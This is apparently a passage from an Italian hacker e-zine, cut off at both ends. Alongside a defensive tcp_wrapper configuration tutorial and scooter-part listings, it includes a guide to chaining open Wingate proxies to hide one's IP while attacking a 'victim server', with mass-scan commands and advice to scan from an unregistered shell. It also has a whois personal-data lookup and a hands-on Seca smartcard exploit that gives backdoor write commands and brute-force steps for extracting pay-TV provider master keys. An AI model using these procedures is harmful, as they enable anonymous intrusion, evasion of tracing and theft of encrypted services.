delle tabelline che ci dicono chi ha il permesso di accedere a che cosa, una cosa
di questo tipo.
Alla mia rete hackersat.com, l'accesso in telnet è permesso solo alla rete hackersat.com,
finger dalla rete hackersat.com e avatar.com, l'ftp è permesso da hackersat.com e
jrash.com e così via.
Naturalmente queste considerazioni si applicano più a sistemi connessi
ad Internet 24 ore su 24 che al nostro PC di casa;
Dove trovare il software
Facile-facile. Sui sistemi Linux è di serie. C'è già, compilato ed installato:
più facile di così...
Non succede altrettanto con altri sistemi Unix, in ogni caso lo potete trovare
qua, direttamente dalla fonte, il Sig. Venema dell'Università di Eindhoven,Olanda:
ftp://ftp.win.tue.nl/pub/security/tcp_wrapper_XXX.tar.gz
dove XXX è l'ultima versione disponibile.
Come funziona e come configurarlo
I file importanti per tcpwrapper sono 3:
/etc/inetd.conf
/etc/hosts.allow
/etc/hosts.deny
Consiglio caldamente di dare una bella occhiata a /etc/inetd.conf: per chi
non lo sapesse è il file di configurazione dell'Internet superd-daemon,
cioè del demone che gestisce quasi tutti i servizi Internet del vostro sistema.
Per vedere il vostro, cliccate qui.
Una attenta occhiata (e magari un po' di man pages) ci riveleranno quali
servizi il nostro sistema fornisce al resto del mondo. Ecco un esempio:
#
# These are standard services.
#
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
gopher stream tcp nowait root /usr/sbin/tcpd gn
questo brandello di inetd.conf ci rivela che sono forniti i servizi di ftp,
telnet e gopher, e che sono gestiti rispettivamente dal
programma in.ftpd, in.telnetd e gn *MA* attraverso /usr/sbin/tcpd: il tcp wrapper.
La sequenza di connessione è questa: arriva una richiesta, lancio il
tcpd (wrapper) che, se le regole di autorizzazione lo permettono, avvia il
demone appropriato. Semplice ed efficace.
Annotiamoci tutti i nomi dei servizi (in.telnetd, etc.) perché ci serviranno
in seguito, per wrapparli. Se nel vostro inetd.conf non avete /usr/sbin/tcpd
significa che non avete il wrapper, oppure lo avete ma il sistema non è
configurato per usarlo.
La riga di configurazione per un servizio non wrappato è per esempio:
telnet stream tcp nowait root /usr/etc/in.telnetd telnetd
Cioè appena arriva una richiesta, si lancia il demone senza alcun controllo.
Se avete modificato la configurazione di inetd, ricordatevi di dare kill -1 1 per
fargliela rileggere.
Ora che conosciamo tutti i servizi forniti dal nostro sistema, è l'ora di decidere
una policy. La policy è la strategia di difesa: dobbiamo decidere quali servizi
lasciare attivi e quali eventualmente disattivare del tutto, e per quelli che
lasciamo attivi decidere quali macchine vi potranno accedere e a che condizioni.
Possiamo anche decidere di tenere un log delle attività permesse e/o negate.
Per esempio possiamo decidere di loggare tutti i telnet effettuati da un certo
dominio, oppure farci mandare una mail se qualcuno fallisce il collegamento
in telnet da una certa macchina, dove noi sappiamo che lavora sempre un tipo
che noi sappiamo avere la fama di piantagrane; insomma, dobbiamo guardarci
intorno e dire: da dove può arrivare il pericolo ???
Si consiglia un approccio un po' più prudente: lasciate attivi solo i servizi
che vi servono veramente. Badate inoltre che permettere l'accesso da domini
tipo .vol.it o .iol.it e via dicendo, permetteranno di entrare non solo a voi
ma anche a tutti gli abbonati di Video On Line e Italia On Line..... in tal
caso consiglio di guardare l'ip della sottorete del provider della vostra città;
in questo modo potranno accedere al sistema solo gli abbonati per esempio a VOL
che chiamano dalla vostra stessa città.
Una volta che avete deciso la vostra policy, si tratta di tradurla in un formato
comprensibile dalla macchina: i files /etc/hosts.allow e /etc/hosts.deny.
Cliccate sul nome del file per leggere i vostri.
hosts.allow dice quali servizi sono concessi, hosts.deny dice quali invece sono negati.
Ogni riga contiene una regola del tipo:
lista_servizi : lista_client [ : opzioni [: opzioni ]]
Il TCP wrapper si comporta così quando arriva una richiesta:
SE la richiesta soddisfa una o più regole di /etc/hosts.allow
l'accesso è accordato
ALTRIMENTI
SE la richiesta soddisfa una o più regole di /etc/hosts.deny
l'accesso è negato
ALTRIMENTI
l'accesso è accordato
In genere i sistemi Linux vengono forniti con hosts.allow e hosts.deny vuoti, o per
essere più precisi, solamente con righe di commento. Secondo l'algoritmo riportato
sopra, l'accesso viene sempre accordato.
Vale la pena di spendere altre due parole sulla policy: possiamo decidere
di permettere solo quello che è concesso da hosts.allow e negare tutto il resto.
Per esempio, permettere telnet, ftp e finger da bianco.com e negare
tutto il resto: /ect/hosts.allow sarà
in.telnetd, in.ftpd, in.fingerd: .bianco.com
e /etc/hosts.deny
ALL : ALL
ALL è una parola speciale, qua ALL:ALL significa "tutti i servizi" : "tutti gli host",
così siamo sicuri di non lasciare buchi.
Notare il punto che precede bianco.com: indica un subdomain da autorizzare,
anzichè un singolo host.
Un'altra policy è quella di negare esplicitamente, e permettere tutto quello
che non è esplicitamente negato. Per esempio vogliamo negare solo l'accesso
in telnet dalla macchina cattivo.rosso.com: /etc/hosts.allow non conterrà
regole, /etc/hosts.deny avrà la regola:
in.telnetd : cattivo.rosso.com
CAVEAT: se in hosts.allow e hosts.deny mettete gli hostname, sappiate che se
il vostro DNS non funziona, le regole potrebbero non essere eseguite correttamente.
Inoltre, se un hacker prende il controllo del vostro DNS può fingersi
una macchina da voi autorizzata sulla base dell'hostname, per cui si
consiglia di mettere i numeri IP anzichè gli host/domain name. Userò
comunque gli hostname per semplicità, ma è meglio mettere per esempio 194.116.2.
anziché la forma letterale.
Le opzioni da specificare dopo l'host, permettono invece di fare tante cose utili come:
eseguire un comando quando viene negato/concesso un
servizio (spawn shell_command , oppure twist shell_command; il primo lancia un
processo in parallelo, l'altro si sostituisce a tcpd e può essere usato per
lanciare un server diverso da quello di inetd.conf)
mostrare un banner personalizzato (banner directory , dove in directory si
suppone ci siano i file testo contenenti i banner, col nome del
servizio: in.telnetd per telnet, etc.)
cercare di ottenere lo username di chi cerca di accedere (rfc931 [timeout in secondi]
usa il protocollo identd per cercare di scoprire, al massimo entro timeout secondi,
lo username di chi cerca di collegarsi)
specificare i privilegi di tcpd (il suo username e il suo group, con
user username[.groupname])
dirgli di verificare periodicamente che il client sia ancora attivo (keepalive)
cambiare la priorità del processo (nice +/-nn)
Alcuni esempi
Per negare tutti i servizi TRANNE finger da pirate.net (hosts.deny)
all EXCEPT in.fingerd : .pirate.net
Per negare gli accessi remoti: (sempre hosts.deny)
in.telnetd,in.rshd,in.rlogind: ALL
Non permettere login da pirate.net e loggare i tentativi:
in.telnetd,in.rlogind : .pirate.net : spawn=(/security/logit %d deny %c %p %a %h %u)&\
: linger 10: rfc931: banners /security/banners
linger 10 significa che il kernel non deve cercare di mandare messaggi al
client dopo 10 secondi che il server ha chiuso la connessione. rfc931
cerca di ottenere lo username, banners visualizza un messaggio del
tipo: "Cercare di penetrare in un sistema informatico è un reato perseguibile
dalla legge. Tutti i tentativi sono loggati".
Spawn lancia uno script (shell o perl) di nome logit, che salva nome del
demone (%d), username@hostname (%c, se lo username è disponibile, altrimenti
solo l'hostname o l'IP se il client non ha hostname), process ID del
demone (%p), IP e hostname del client (%a %h) e lo username (%u).
Programmi di utilità e letture consigliate
Alcuni programmi forniti con tcpd ci aiutano a testare la nostra configurazione.
Altrimenti, come faremmo a sapere se effettivamente l'accesso telnet viene
negato all'indirizzo pericolo.pirate.net ?????
I programmi da usare sono i seguenti:
tcpdchk: ci dice se ci sono errori di sintassi in hosts.allow e hosts.deny
tcpdmatch: la sintassi corretta è
tcpdmatch [-d] [-i inet_conf] daemon client
Quindi non controlla solo hosts.allow e deny, ma anche inetd.conf. -d gli dice di
non usare hosts.allow e deny di sistema ma quelli nella directory corrente.
Per esempio, possiamo dargli:
tcpdmatch in.telnetd macchina.qualsiasi.dominio
Ci darà un output del genere:
client: hostname paranoid
client: address 123.12.164.12
server: process in.telnetd
matched: /etc/hosts.deny line 10
access: denied
True
www.hackersat.com
/===========================::=============================::=================/
/ /How to Wingate / SPYRO /
/===========================::=============================::=================/
:::!~!!!!!:.
.xUHWH!! !!?M88WHX:.
.X*#M@$!! !X!M$$$$$$WWx:.
:!!!!!!?H! :!$!$$$$$$$$$$8X:
!!~ ~:~!! :~!$!#$$$$$$$$$$8X:
!~::!H!< ~.U$X!?R$$$$$$$$MM!
~!~!!!!~~ .:XW$$$U!!?$$$$$$RMM! .:: How to Wingate ::.
!:~~~ .:!M"T#$$$$WX??#MRRMMM!
~?WuxiW*` `"#$$$$8!!!!??!!!
:X- M$$$$ `"T#$T~!8$WUXU~
:%` ~#$$$m: 0 ~!~ ?$$$$$$
:!`.- ~T$$$$8xx. .xWW- ~""##*"
..... -~~:<` ! ~?T#$$@@W@*?$$ 0 /`
W$@@M!!! .!~~ !! .:XUW$W!~ `"~: : _____
#"~~`.:x%`!! !H: !WM$$$$Ti.: .!WUn+!` / ___/ ____ __ __ _____ ____
:::~:!!`:X~ .: ?H.!u "$$$B$$$!W:U!T$$M~ \__ \ / __ \ / / / / / ___// __ \
.~~ :X@!.-~ ?@WTWo("*$$$W$TH$! ` ___/ / / /_/ // /_/ / / / / /_/ /
Wi.~!X$?!-~ : ?$$$B$Wu("**$RM! /____/ / .___/ \__, / /_/ \____/
$R@i.~~ ! : ~$$$$$B$$en:`` /_/ /____/
?MXT@Wx.~ : / ~"##*$$$$M~ __ __ __
$$$$" / / / / ____ _ _____ / /__
/ /_/ / / __ `// ___/ / //_/
/ __ / / /_/ // /__ / ,<
/_/ /_/ \__,_/ \___/ /_/|_|
<<Http://www.spyrohack.com or Http://spyro.shawneeok.com>> << spyro2600@yahoo.it>>
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.
DISCLAIMER
Prima di cominciare vorrei ricordarvi che tutto quello che è riportato qua sotto è di
solo scopo informativo,quindi se provocate danni ad altre persone o a voi stessi,
io non sono responsabile!!
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.
Oggi tratterò di un'argomento abbastanza noto a tutti,ma cercherò di renderlo il più leggibile
e comprensibile dei modi.
Prima di tutto,cos'è un Wingate?
Il wingate è un software che fa da firewall proxy server,il quale permette di gestire
una singola o multipla connessione in un'intera rete network di computer.
Le connessioni internet ai wingate,sono permesse a quasi tutti i tipi,ovvero:
1)Dial-up Modem
2)ISDN
3)XDSL
3)Cable modem
4)Connessione Satelliatre
5)T1
Bene,credo che non ci siano molte cose da imparare.
Adesso le informazioni base c'è le abbiamo,tanto x non farci dire dalle altre persone
che non sappiamo cosa sia un Wingate ;)
Naturalmente anche i wingate sono importantissimi per uno smanettone,infatti ci vengono in
aiuto nel campo dell'anonimato.
I wingate si possono usare come ponte fra la nostra linux box(spero)e il server da attaccare.
Naturalmente questo ponte ha i suoi pregi,infatti ci coprirà il nostro numero ip in modo che
il server che attaccheremo o in cui ci collegheremo,visualizzera l'ip del wingate e non quello
della notra box.
Adesso vi propongo un'esempio grafico-testuale per capire meglio il concetto:
Numeri ip di wingate(inventati) Lettera associata
200.231.12.6 A
124.103.43.9 B
126.222.52.1 C
188.121.32.4 D
230.282.21.6 E
Nostra Box -> Wingate A -> Wingate B -> Wingate C -> Wingate D -> Wingate E -> Server Vittima
Ok,veniamo alla spiegazione:
Noi ci colleghiamo al wingate A(200.231.12.6),quest'ultimo si collega al B(127.103.43.9)e così
di seguito finchè il wingate E non si collega al server della vittima.
Quindi il nostro ip verrà coperto dal wingate A,quello della A dal B e così via,così la vittima
per risalire al nostro ip dovrà prima rintracciare quelli dei 4 wingate.
Dico 4 perchè il quinto (E) è quello che si collega direttamente alla vittima.
Avete capito la convenienza?
Beh...credo propio di sì.
Voi penserete: " Ma dove e come posso usufruire di questi wingate?"
Bene,vi rispondo subito.
I wingate si possono usare per connettersi tramite telnet ad altre porte,e anche per
chattare anonimamente nelle reti irc.
Per usare un wingate bisogna saperlo riconoscere,quindi ecco 2 suoi aspetti:
1) Quesi sempre "lavora" sulla porta 23(di quesi sempre perchè ne ho visti alcuni sulla 21)
2) Appena connessi riceveremo una risp. tipo questa: WinGate>
Adesso che sappiamo come sono fatti,sfruttiamoli :)
Per ircnet basta impostare fra le opzioni del nostro client l'ip del wingate(o l'host)
e la porta 23(se non varia).
Mentre tramite telnet fra le opzioni mettiamo sempre ip e porta 23,ma varia l'uso.Ovvero appena
connessi ci apparirà la scritta:
WinGate>
Quindi noi diamo i seguenti comandi:
WinGate> wingateB:23
Ovvero:
WinGate>124.103.43.9:23
Come possiamo notare dopo il numero ip vanno messi i due punti e il numero della porta.
Naturalmente i possono variare anche i comandi del wingate,per esempio:
WinGate> wingateB 23
Ovvero:
WinGate>124.103.43.9 23
Come si vede,tra l'ip e il numero della porta c'è solo uno spazio e non i due punti.
Comunque per l'uso possiamo trovare le informazioni al momento della connessione al wingate,in
casi di uso diverso a questi riportati sopra viene segnalato dal software stesso.
Adesso sappiamo cos'è un wingate,come riconoscerlo,come usarlo,cosa ci manca?
Ah già...quasi dimenticavo: Come trovarli!
Ci sono vari modi per trovarli,e adesso ve ne propongo alcuni suddivisi per OS(sistema
operativo)
Windows:
1) Farseli dare da un'amico,ma non mi sembra propio il caso di uno smanettone.
2) Usare un programma di nome Wingate scanner 2.2 reperibile negli script per Mirc.
Programma che analizza gli ip e controlla se sono presenti wingate.
3) Usare quei simpatici Wingate scan-presenti negli script per Mirc.
Ovvero quegli script che scannano gli hosts dei poveri utenti presenti nel canale in cui è
stato fatto partire lo scan(consiglio canali affollatti per ovvie ragioni).
Linux:
1) Farseli dare da un'amico,ma sapete già quale è il mio parere.
2) Usare un bel programma di nome SynScan reperibile su (http://psychoid.lam3rz.de).
Costui non è un normalissimo portscan,infatti non scanna un solo ip alla ricerca delle porte
aperte sul determinato server,ma fa uno scan di range su una determinata porta.
Ah,tanto x farvi un'idea di come è fatto un range,vi faccio un'esempio:
Il range XXX.XX(quindi 2 numeri fissi che non cambiano)incomincia da XXX.XX.0.0 e finisce a
XXX.XX.255.255
Quindi se usiamo synscan in questo modo:
./synscan 127.0 127.0.out eth0 10 23
Scanneremo tutto l'ip 127.0 e il risultato andrà a finire nel file 127.0.out .
eth0 stà per scheda di rete,con cui non faremo lo scan.
(Se usate connessione dialup modem mettete ppp0)
10 è la velocità dello scan
(Se usate connessione dialup modem abbassatela,rischio disconnessione)
e 23 è la porta che verrà scannata.
Alla fine dello scan andremo a spulciare il file 127.0.out per controllare se sono stati
trovati wingate.
Consiglio vivamente di usare questo metodo da una shell non registrata con i propi dati
anagrafici.
Questo perche lo scan verrà loggato in tutte le connessioni andate a buon fine,quindi lascie
rete tracce.
Ecco,penso che questi siano i metodi migliori per trovare wingate.
Adesso non ci manca altro che provare l'anonimità dei wingate.
Appena connessi al wingate inviamo una connessione verso il numero ip della nostra box,e
tramite un firewall o il comando netstat rileviamo se è propio il nostro ip che tenta la
connessione o quello del wingate.
Un'altro modo è qello di collegarsi su irc con il wingate ,e tramite i comandi whois o dns
controllare il numero ip.
Anche qui ci sono svariati metodi,usate la fantasia.
Piccola riflessione:
C'è da dire che l'uso dei wingate non rende l'anonimato al 100% ,anche perchè alcuni loggano
davvero tutto.
Ma se facciamo una bella catena di wingate possiamo stare più tranquilli che a ip scoperto.
Pultroppo collegandosi a vari wingate,la velocità di connessione tramite telnet diminuisce,ma
cosa ci volete fare....meglio aspettare un capellino in più di tempo che essere beccati in
fragrante,no?
Bene.....vi lascio con questa piccola riflessione,spero di essere stato preciso e esauriente
riguardo l'argomento trattato.
Byez alla prossima!
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cd /saluti
bash# cat saluti.txt
Saluti:
Bakunin(Mio grande maestro),AtlaWare,mR_bIs0n(Mio Fratellone),Spawn,BsTHaCk,Anubi,D4rkSt4r.
Radion,Warning,Terror,Gouranga,Blender,Prodigy,Hiolz[83],Memorik,Hedo,MrWolf,Screen_it,
zapotecz,Goony,Scire,Sulex,Floppino,Grungio,Fratak,McGiver,AntiS,gouranga,LizDay,satz,
cancerman,Dea,ULCC,Spider2k, Ice'St0rm e tutti quelli che ho dimenticato
di #phreak.it(scusatemi).Poi saluto anche tutti quelli dei tankcommandos,della hrn
,pbk,Maphias0ft,gli Spippolatori,in particolare il grande Master,Chrome, Brigante
,RigorMortem,Vinx2020,fen0x,risk e tutti quelli che mi vogliono bene :)
Fuck to: MMMMM un gran vaffanculo all'amicizia fra ragazzi e ragazze!!!!!!
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cat end.c
#include <stdio.h>
main(){
printf("Anche per oggi è tutto dal vostro SPYRO\n");
printf("Ciaoooooooooooo\n");
}
bash# halt
ATTENDERE:ARRESTO DEL SISTEMA IN CORSO......
ORA SI PUO' SPEGNERE IL COMPUTER!
ahahaha scherzo ;)
/===========================::=============================::=================/
/ /Informazioni personali grazie al database del NIC / Ghent /
/===========================::=============================::=================/
--cut here-- un articoletto veloce veloce
// Ricavare informazioni personali grazie al database del
NIC \\
Non tutti sanno che i dati che si è obbligati a fornire quando si
registra
un domino sono accessibili a tutti dal web.
Provare per credere: http://www.nic.com o per la precisione
http://www.nic.com/cgi-bin/whois.cgi
Dovete semplicemente inserire il dominio ed avrete nome, cognome ed
indirizzo del registrante.
Ecco un esempio fatto su altavista.com... non rende molto perche' non è
registrato ad un privato ma ad un azienda, giusto per dare un'idea.
***
Registrant:
AltaVista Company (ALTAVISTA16-DOM)
529 Bryant St.
Palo Alto, CA 94301
US
Domain Name: ALTAVISTA.COM
Administrative Contact:
AltaVista Domain Administration (AD14996-OR) dns-admin@AV.COM
AltaVista Company
c/o AltaVista Legal Department
1070 Arastradero Rd
Palo Alto, CA 94304
US
650-320-7700
Fax- 650-320-6433
Technical Contact:
AltaVista Operations (AO111-ORG) dns-technical@AV.COM
AltaVista Company
1070 Arastradero Road
Palo Alto, CA 94304
US
650-295-2508
Fax- - - 650-617-3200
Billing Contact:
AltaVista Domain Billing (AD14995-OR) dns-billing@AV.COM
AltaVista Company
1070 Arastradero Road
Palo Alto, CA 94304
US
650-295-2508
Fax- 650-320-6433
***
Semplice ed efficace, no? :)
A presto,
Ghent
--cut here-- fine articoletto veloce veloce
/===========================::=============================::=================/
/ /Bug 32/34 / sYn's father /
/===========================::=============================::=================/
Questo è il primo bug usufruito per lestrazione delle key dalle card ed
è anche il più radicato e cioè difficile da eliminare (per loro) in quanto è
legato alla struttura interna dei record. Sapendolo sfruttare, con
linserimento di una backdoor si possono estrarre TUTTE le altre key, primarie
e secondarie e ricavare altri dati contenuti nelleeprom.
Un buon programma per ottenere dei dump è CardMaster+ v 0.5, per prima cosa clicchiamo
su Connect e poi su Records.
Esempio.
Provider 0 .
Record 0001 = 01 00 00 00 00 00 00 00 00 00 80 E0
Record 0002 = 00 04 05 00 1E 00 10 03 3C 43 22 E0
Record 0003 = F0 FF FF FF FF FF FF FF FF 81 00 80
Record 0004 = 50 FF FF FF FF FF FF FF FF 66 00 C0
Record 0005 = F1 FF FF FF FF FF FF FF FF 3C 00 80
Record 0006 = 51 FF FF FF FF FF FF FF FF 83 00 C0
Indicatori records:
E0 record seca
8X key primarie X=0 prov 00, X=1 prov 01 etc.
CX key secondarie
Indicatori key:
F0 key 00 ( prov 00 )
F1 key 01 ( prov 00, questa era una card mai inserita nel decoder )
01 tipo di record seca
Provider 1 .
Record 0007 = F0 FF FF FF FF FF FF FF FF BD 00 81
Record 0008 = 50 FF FF FF FF FF FF FF FF 9C 00 C1
Record 0009 = F2 FF FF FF FF FF FF FF FF 0C 00 81
Record 000A = 52 FF FF FF FF FF FF FF FF E7 00 C1
Provider 2 .
Record 000B = F0 FF FF FF FF FF FF FF FF 0A 00 82
Record 000C = 50 FF FF FF FF FF FF FF FF DA 00 C2
Record 000D = F2 FF FF FF FF FF FF FF FF 60 00 82
Record 000E = 52 FF FF FF FF FF FF FF FF CF 00 C2
Ora ordiniamo i record per numero:
Record 0001 = 01 00 00 00 00 00 00 00 00 00 80 E0
Record 0002 = 00 04 05 00 1E 00 10 03 3C 43 22 E0
Record 0003 = F0 FF FF FF FF FF FF FF FF 81 00 80
Record 0004 = 50 FF FF FF FF FF FF FF FF 66 00 C0
Record 0005 = F1 FF FF FF FF FF FF FF FF 3C 00 80
Record 0006 = 51 FF FF FF FF FF FF FF FF 83 00 C0
Record 0007 = F0 FF FF FF FF FF FF FF FF BD 00 81
Record 0008 = 50 FF FF FF FF FF FF FF FF 9C 00 C1
Record 0009 = F2 FF FF FF FF FF FF FF FF 0C 00 81
Record 000A = 52 FF FF FF FF FF FF FF FF E7 00 C1
Record 000B = F0 FF FF FF FF FF FF FF FF 0A 00 82
Record 000C = 50 FF FF FF FF FF FF FF FF DA 00 C2
Record 000D = F2 FF FF FF FF FF FF FF FF 60 00 82
Record 000E = 52 FF FF FF FF FF FF FF FF CF 00 C2
Per vedere se qualche key è trappolabile clicchiamo su Dump:
Records in plain
Record 0005 = 00 83 00 C0 F1 67 67 05 45 0C DB F2
Done.
Addirittura 7 bytes della mk01 prov 00...meglio di così non si può.
Per ottenerla tutta ci serve la risposta della 5A e un prog che supporti la ricerca
brute force.
Scriveremo:
key da trovare : 67 67 05 45 0C DB F2 00 ; fissi i bytes in grassetto
Decripted key : 00 00 00 00 00 00 00 00
Cripted key : B8 D0 8E AB 65 D1 7F 82 ; risposta dellins 5A
Questo se siamo stati fortunati.
Se non ci sono keys trappolabili o ne trappoliamo solo 3 bytes, dobbiamo creare
una backdoor sul prov 00 per poter inviare comandi C140.
Adesso sfruttiamo il bug in maniera attiva in modo da ottenere ciò che vogliamo.
Sappiamo che un record è costituito da 12 bytes, le posizioni 4° e 8° sono
quelle dove i bytes rimangono trappolati. Il nostro obbiettivo è la key 00
prov 00.
1° 2° 3° 4° 5° 6° 7° 8° 9° 10°11°12°
Record 0002 = 00 04 05 00 1E 00 10 03 3C 43 22 E0
Record 0003 = F0 FF FF FF FF FF FF FF FF 81 00 80
Possiamo modificare il record seca 00 e mettere un valore trappolabile sul quarto
byte così da fargli portare dietro i bytes (per la precisione gli ultimi 5)
della mk00 ( F0 ).
1° 2° 3° 4° 5° 6° 7° 8° 9° 10°11°12°
Record 0002 = 00 04 05 00 1E 00 10 03 3C 43 22 E0
Record 0003 = F0 FF FF FF FF FF FF FF FF 81 00 80
Con la backdoor (ad esempio la 05) inviamo questo
comando: (nano B0 per scrivere un record seca)
C140000515 B0 00 04 05 E0 1E 00 10 03 3C 43 22 82 SS SS SS SS SS SS SS SS
00 è il tipo del record seca
E0 byte trappolabile (va bene anche 90)
CardMaster dice:
Records in plain
1° 2° 3° 4° 5° 6° 7° 8° 9° 10°11°12°
Record 0003 = AD B6 77 3D F9 81 00 80 00 04 05 E0
Done.
Ecco gli ultimi 5 bytes della mk00 non mascherati proprio come volevamo.
Poi ripristiniamo il record originale perchè non siamo degli zozzoni ;)
C140000515 B0 00 04 05 00 1E 00 10 03 3C 43 22 82 SS SS SS SS SS SS SS SS
Adesso che conosciamo la 00 possiamo ricavarci le chiavi che la seguono, modificando
il terzo byte della mk00 primaria otteniamo 5 byte della secondaria,
modificando la mk00 secondaria ricaviamo la 01 primaria e così via seguendo la
mappa ottenuta dal riordino di prima.
Il comado è del tipo:
C140000513 90 KP AA AA AA AA AA AA AA AA 82 SS SS SS SS SS SS SS SS KP key primaria
C140000513 91 ks AA AA AA AA AA AA AA AA 82 SS SS SS SS SS SS SS SS ks key secondaria
AA AA AA AA AA AA AA AA nuova key criptata con la key 05
E dopo ricordatevi di ripristinare i valori originali delle key modificate!
Sulla ricerca della secondaria bisogna avere un programma che faccia il brute force
con entrambe le chiavi (cocdec va benissimo) e conoscere la key primaria.
Scriveremo:
key da trovare : PP PP PP PP PP PP PP PP ; primaria, conosciuta.
: 00 00 00 SS SS SS SS SS ; secondaria, fissi i bytes in grassetto.
Decripted key : 00 00 00 00 00 00 00 00
Cripted key : 5A 5A 5A 5A 5A 5A 5A 5A ; risposta dellins 5A con P1 = 1X.
Altri casi più frequenti di record precedenti ad una key ( su card già attivate ):
key preceduta da Provider Package Bitmap, indicatore: 9X
key preceduta da Provider PPV Credit Record, indicatore: Dx
ecco come si può presentare:
Record 0009 = 00 00 00 00 00 00 00 94 00 00 00 91 bitmap di pacchetto prov 01
Record 000A = 51 FF FF FF FF FF FF FF FF 60 00 81 key da trappolare
Quindi il comando per modificare il bitmap package:
C1 40 00 05 15 24 00 10 80 00 00 00 E0 00 00 00 94 82 SS SS SS SS SS SS SS SS
Per rimetterlo a posto:
C1 40 00 05 15 24 00 10 80 00 00 00 00 00 00 00 94 82 SS SS SS SS SS SS SS SS
2)
Record 0014 = 00 00 00 00 00 15 3F 00 00 00 00 D1 PPV credit record
Record 0015 = 51 FF FF FF FF FF FF FF FF AB 00 81 key da trappolare
Dalla SECAFAQ troviamo che lormai affezionato 4° byte fa parte del numero di
gettoni acquistati.
153F è la data, con il nano 43 bisognerà mettere un valore più grande di 153F:
C1 40 00 05 11 24 00 10 43 15 7F E0 00 82 SS SS SS SS SS SS SS SS
Per ripristinarlo occorre prima cancellare il record e poi riscriverlo, questo perché
non possiamo sovrascrivere acquisti con date antecedenti a quella presente
nel record. Utilizziamo il nano 42 per cancellarlo:
C1 40 00 05 11 24 00 10 42 FF FF 00 00 82 SS SS SS SS SS SS SS SS
E poi lo riscriviamo:
C1 40 00 05 11 24 00 10 43 15 3F 00 00 82 SS SS SS SS SS SS SS SS
Con questo modesto testo spero di aver chiarito alcuni dubbi a chi si ritrova
alle prime armi di fronte alla tecnica di trappolamento keys, sicuramente
avrò commesso delle imprecisioni...un consiglio che mi sento di dare e che
utilizzo io stesso è quello di non prendere mai niente per oro colato,
controllare e capire bene che comandi stiamo mandando alle nostre cards.
Ci tengo a precisare che non mi assumo NESSUNA paternità delle
procedure utilizzate qui sopra, anche perché ci farei una bella figuraccia ;)
/===========================::=============================::=================/
/ /Motori&Motori / Jrash /
/===========================::=============================::=================/
######################################°Motori&Motori°##########################################
Autore : Jrash
consumi : sto a dieta!
musica : mixerie by DJ rogo...
Salve ragazzi come va?? A me tutto bene e spero anche a voi...
Bene siccome non ho intenzione di annoiarvi con le mie solite pallose intro, quindi
andiamo al sodo. In questo articolo vi parlero un po' di tutto riguardo a motori, rulli,
marmitte e ecc...
Bene allora iniziamo:
1)CONFIGURAZIONE IDEALE DEL VOSTRO SCOOTER PER LA COMPETIZIONE.
Jrash al fine di fornire un metodo di messa a punto dello scooter ai massimi livelli per
le competizione nei luoghi ad esse destinate secondo le disposizioni delle seguenti
autorita' sportive, ha predisposto il seguente STEP di montaggio:
COMPETIZIONE--------> gruppo termico MHR-------> albero motore rhq------>
espansione scooter racing------> valvola lamellare------> impianto alimentatore C 19-21-25
------> variatore multivar------> cinghia-------> correttore di coppia------>
semipuleggia fissa-----> frizione-----> centralina----> ingranaggi.
Tutti i componenti devono essere fissati complessivamente.
2)CONFIGURAZIONE IDEALE DEL VOSTRO SCOOTER.
Linea particolarmente indicata per accrescere il conforte la sicurezza di guida,
da utilizzarsi anche su strada rendendo qualsiasi scooter piu' facile e divertente da
usare per qualsiasi livello di STEP:
SAFETY LINE-----> ceppi freno----> dischi freno-----> pastiglia freno sport o mhr----->
ammortizzatore RS3-RS24-RS24/10------> forcella F32S------> olio malossi 7.1 o 7.3
3)SPORT PRO 6
La Marmitta Sport Pro6 è dotata di un silenziatore colorato , acquistabile a ricambio
nei colori rosso, giallo, oro e blu. Ottime prestazioni su tutto l'arco di utilizzo sia c
on motori originali che modificati. Viene fornito completo di rulli al variatore.
4)NO SMOKING: NUOVI IMPIANTI SCARICO IN LEGA LEGGERA PER SCOOTER
Le nuovissime "No Smoking", sono la sintesi della più avanzata tecnologia Polini -
Motori per gli scooter. Si distinguono per essere realizzati da due semi-gusci in lega
leggera pressofusa con espansione interna. Sono caratterizzati da una maggiore
silenziosità anche rispetto agli impianti di scarico originali montati sui vari modelli
di scooter.
La Polini - Motori vuole dare con questa specifica scelta tecnica,
una risposta concreta al problema della rumorosità.
I nuovi impianti di scarico Polini in lega leggera riducono, infatti, notevolmente l
emissione delle onde sonore, delle vibrazioni. Offrono una maggiore resistenza
meccanica e una semplice manutenzione in quanto facilmente smontabili. Internamente
è sistemato un silenziatore di tipo meccanico e paratie in acciaio.
Il silenziatore finale, a scarico diretto, è avvolto da uno spesso strato di
materiale fono assorbente rigenerabile. Il look dei nuovi impianti scarico Polini - Motori
in lega leggera è moderno ed è caratterizzato dal disegno compatto e dalle dimensioni
contenute.
5)RULLI (new)
Rivestite della mescola speciale Tefloyt, sono particolarmente affidabili e
resistenti all'usura. Disponibili per la maggior parte di scooter in circolazione.
Vasta gamma di diametri e pesi differenti , permettando così di ottimizzare l'erogazione,
tenendo conto delle proprie esigenze di guida.
Colore Grammi Colore Grammi
arancione 5.5 rosso 4.0
rosso 6.0 verde 4.5
bianco 6.5 giallo 5.0
verde 7.0 grigio 5.7
blu 7.5 nero 6.3
giallo 8.0
Ora vi elenchero' dei pezzi della marca top perfomance una nuova casa di pezzi che
sta davvero sfondando nel mondo dei motori..
6)GRUPPI TERMICI MAGGIORATI
Queste parti termiche portano la cilindrata, a seconda del modello, da 68 cc a 73,5 cc,
aumentando notevolmente i valori di coppia e potenza, con il relativo incremento delle
prestazioni globlali dello scooter.Per il cilindro è stata utilizzata la speciale
ghisa "Minacrom", addittivata al cromo per migliorare la scorrevolezza e minimizzare l'usura.
Applicazioni
Per motori serie "Minarelli/Yamaha" di tipo verticale
Per motori serie "Minarelli/Yamaha" di tipo orizzontale aria e liquid cooled
Per Gilera e Piaggio aria e liquid cooled
Per Peugeot aria e liquid cooled
7)CARBURATORE MIKUNI
